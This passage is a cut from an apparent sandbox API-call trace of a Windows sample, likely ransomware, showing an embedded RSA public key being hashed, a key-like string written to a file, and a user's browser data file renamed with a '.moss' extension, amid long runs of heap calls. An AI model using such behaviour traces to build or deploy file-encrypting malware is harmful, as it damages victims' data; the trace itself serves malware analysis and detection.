KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.973] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.973] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.973] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.973] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f1c8) returned 1 [0172.974] CryptCreateHash (in: hProv=0xd2f1c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.974] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.974] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.974] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.974] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.974] GetLastError () returned 0x0 [0172.974] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.974] CryptReleaseContext (hProv=0xd2f1c8, dwFlags=0x0) returned 1 [0172.975] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.975] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.975] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.975] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.975] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.975] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.975] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.976] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.976] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0172.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0172.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0172.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0172.988] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0172.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0172.988] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0172.988] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0172.988] CloseHandle (hObject=0x664) returned 1 [0172.990] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609fa8 [0172.990] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8d0) returned 0x3b44498 [0172.990] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609fa8 | out: hHeap=0xcd0000) returned 1 [0172.990] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.moss")) returned 1 [0172.990] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.990] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.990] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0172.992] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UV0DUWVB", cAlternateFileName="")) returned 1 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609fa8 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609e18 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa8) returned 0x35e3280 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xd0) returned 0x35c44a8 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a200 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a2c8 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35c4658 | out: hHeap=0xcd0000) returned 1 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609fa8 | out: hHeap=0xcd0000) returned 1 [0172.992] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 1 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609fa8 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609e18 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609fa8 | out: hHeap=0xcd0000) returned 1 [0172.992] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 0 [0172.992] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f4d0 | out: hHeap=0xcd0000) returned 1 [0172.992] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f4d0 [0172.992] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f418 | out: hHeap=0xcd0000) returned 1 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 